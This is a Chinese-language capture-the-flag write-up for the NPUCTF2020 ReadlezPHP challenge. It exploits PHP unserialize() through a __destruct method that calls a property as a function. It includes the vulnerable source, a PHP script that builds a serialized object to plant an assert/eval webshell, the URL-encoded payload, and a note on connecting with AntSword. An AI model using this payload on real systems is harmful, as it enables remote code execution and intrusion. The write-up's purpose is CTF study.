[NPUCTF2020]ReadlezPHP

进去扫描目录，啥都没有，查看源代码

#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

php反序列化
观察下__destruct()魔术方法

属性b包裹住属性a
刚好可以传个木马进去
利用assert()函数
assert 判断一个表达式是否成立
assert()可以将整个字符串参数当作php参数执行。
所以构造木马

assert(eval($_POST[penson]);)

exp如下

error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}

$test = new HelloPhp();
$test->b = 'assert';
$test->a = 'eval($_POST[penson]);';

echo urlencode(serialize($test));


?>

payload

?data=O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A21%3A%22eval%28%24_POST%5Bpenson%5D%29%3B%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D

蚁剑连接啥都没有…
去看看phpinfo
还是没有啥过滤，我直接搜flag

emmmmmm，在这里头